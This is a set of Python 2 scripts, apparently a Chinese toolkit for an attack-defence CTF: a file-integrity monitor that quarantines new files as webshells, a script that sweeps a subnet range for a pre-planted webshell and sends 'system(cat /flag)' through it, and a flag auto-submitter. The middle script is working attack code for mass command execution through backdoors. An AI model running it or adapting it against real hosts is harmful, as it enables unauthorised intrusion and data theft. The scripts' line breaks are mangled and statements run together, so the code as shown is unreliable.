1、文件监控的脚本# -*- coding: utf-8 -*-#use: python file_check.py ./import osimport hashlibimport shutilimport ntpathimport time
CWD = os.getcwd()FILE_MD5_DICT = {} # 文件MD5字典ORIGIN_FILE_LIST = []# 特殊文件路径字符串Special_path_str = 'drops_JWI96TY7ZKNMQPDRUOSG0FLH41A3C5EXVB82'bakstring = 'bak_EAR1IBM0JT9HZ75WU4Y3Q8KLPCX26NDFOGVS'logstring = 'log_WMY4RVTLAJFB28960SC3KZX7EUP1IHOQN5GD'webshellstring = 'webshell_WMY4RVTLAJFB28960SC3KZX7EUP1IHOQN5GD'difffile = 'diff_UMTGPJO17F82K35Z0LEDA6QB9WH4IYRXVSCN'Special_string = 'drops_log' # 免死金牌UNICODE_ENCODING = "utf-8"INVALID_UNICODE_CHAR_FORMAT = r"\?%02x"# 文件路径字典spec_base_path = os.path.realpath(os.path.join(CWD, Special_path_str))Special_path = {
'bak' : os.path.realpath(os.path.join(spec_base_path, bakstring)),
'log' : os.path.realpath(os.path.join(spec_base_path, logstring)),
'webshell' : os.path.realpath(os.path.join(spec_base_path, webshellstring)),
'difffile' : os.path.realpath(os.path.join(spec_base_path, difffile)),}def isListLike(value):
return isinstance(value, (list, tuple, set))# 获取Unicode编码def getUnicode(value, encoding=None, noneToNull=False):
if noneToNull and value is None:
return NULL if isListLike(value):
value = list(getUnicode(_, encoding, noneToNull) for _ in value)
return value if isinstance(value, unicode):
return value elif isinstance(value, basestring):
while True:
try:
return unicode(value, encoding or UNICODE_ENCODING)
except UnicodeDecodeError, ex:
try:
return unicode(value, UNICODE_ENCODING)
except:
value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:]
else:
try:
return unicode(value)
except UnicodeDecodeError:
return unicode(str(value), errors="ignore")# 目录创建def mkdir_p(path):
import errno try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else: raise# 获取当前所有文件路径def getfilelist(cwd):
filelist = []
for root,subdirs, files in os.walk(cwd):
for filepath in files:
originalfile = os.path.join(root, filepath)
if Special_path_str not in originalfile:
filelist.append(originalfile)
return filelist# 计算机文件MD5值def calcMD5(filepath):
try:
with open(filepath,'rb') as f:
md5obj = hashlib.md5()
md5obj.update(f.read())
hash = md5obj.hexdigest()
return hash except Exception, e:
print u'[!] getmd5_error : ' + getUnicode(filepath)
print getUnicode(e)
try:
ORIGIN_FILE_LIST.remove(filepath)
FILE_MD5_DICT.pop(filepath, None)
except KeyError, e:
pass# 获取所有文件MD5def getfilemd5dict(filelist = []):
filemd5dict = {}
for ori_file in filelist:
if Special_path_str not in ori_file:
md5 = calcMD5(os.path.realpath(ori_file))
if md5:
filemd5dict[ori_file] = md5 return filemd5dict# 备份所有文件def backup_file(filelist=[]):
# if len(os.listdir(Special_path['bak'])) == 0:
for filepath in filelist:
if Special_path_str not in filepath:
shutil.copy2(filepath, Special_path['bak'])if __name__ == '__main__':
print u'---------start------------'
for value in Special_path:
mkdir_p(Special_path[value])
# 获取所有文件路径,并获取所有文件的MD5,同时备份所有文件
ORIGIN_FILE_LIST = getfilelist(CWD)
FILE_MD5_DICT = getfilemd5dict(ORIGIN_FILE_LIST)
backup_file(ORIGIN_FILE_LIST) # TODO 备份文件可能会产生重名BUG
print u'[*] pre work end!'
while True:
file_list = getfilelist(CWD)
# 移除新上传文件
diff_file_list = list(set(file_list) ^ set(ORIGIN_FILE_LIST))
if len(diff_file_list) != 0:
# import pdb;pdb.set_trace()
for filepath in diff_file_list:
try:
f = open(filepath, 'r').read()
except Exception, e:
break
if Special_string not in f:
try:
print u'[*] webshell find : ' + getUnicode(filepath)
shutil.move(filepath, os.path.join(Special_path['webshell'], ntpath.basename(filepath) + '.txt'))
except Exception as e:
print u'[!] move webshell error, "%s" maybe is webshell.'%getUnicode(filepath)
try:
f = open(os.path.join(Special_path['log'], 'log.txt'), 'a')
f.write('newfile: ' + getUnicode(filepath) + ' : ' + str(time.ctime()) + '\n')
f.close()
except Exception as e:
print u'[-] log error : file move error: ' + getUnicode(e)
# 防止任意文件被修改,还原被修改文件
md5_dict = getfilemd5dict(ORIGIN_FILE_LIST)
for filekey in md5_dict:
if md5_dict[filekey] != FILE_MD5_DICT[filekey]:
try:
f = open(filekey, 'r').read()
except Exception, e:
break
if Special_string not in f:
try:
print u'[*] file had be change : ' + getUnicode(filekey)
shutil.move(filekey, os.path.join(Special_path['difffile'], ntpath.basename(filekey) + '.txt'))
shutil.move(os.path.join(Special_path['bak'], ntpath.basename(filekey)), filekey)
except Exception as e:
print u'[!] move webshell error, "%s" maybe is webshell.'%getUnicode(filekey)
try:
f = open(os.path.join(Special_path['log'], 'log.txt'), 'a')
f.write('diff_file: ' + getUnicode(filekey) + ' : ' + getUnicode(time.ctime()) + '\n')
f.close()
except Exception as e:
print u'[-] log error : done_diff: ' + getUnicode(filekey)
pass
time.sleep(2)
# print '[*] ' + getUnicode(time.ctime())
预留后门利用#coding=utf-8import requests
url_head="http://xxx.xx.xxx."#网段url=""shell_addr="/Upload/index.php"passwd="xxxxx"#×××密码port="80"payload = {passwd: 'system(\'cat /flag\');'}webshelllist=open("webshelllist.txt","w")flag=open("firstround_flag.txt","w")for i in range(30,61):
url=url_head+str(i)+":"+port+shell_addrtry:
res=requests.post(url,payload,timeout=1)
if res.status_code == requests.codes.ok:
result = url+" connect shell sucess,flag is "+res.textprint resultprint >>flag,resultprint >>webshelllist,url+","+passwdelse:
print "shell 404"
except:
print url+" connect shell fail"webshelllist.close()flag.close()
自动提交flag#!/usr/bin/env python2import sysimport jsonimport urllibimport httplib
server_host = ' '#提交flag的服务器地址server_port = 80def submit(team_token, flag, host=server_host, port=server_port, timeout=5):
if not team_token or not flag:
raise Exception('team token or flag wrong')
conn = httplib.HTTPConnection(host, port, timeout=timeout)
params = urllib.urlencode({#提交需要post的参数,根据情况修改
'token': team_token,
'flag': flag,
})
headers = {
"Content-type": "application/x-www-form-urlencode"
}
conn.request('POST', '[submit_flag_dir]', params, headers)#第二个参数为提交flag的目录
response = conn.getresponse()
data = response.read()
return json.loads(data)if __name__ == '__main__':
if len(sys.argv)
print 'usage: ./submitflag.py [team_token] [flag]'
sys.exit()
host = server_hostif len(sys.argv) > 3:
host = sys.argv[3]
print json.dumps(submit(sys.argv[1], sys.argv[2], host=host), indent=4)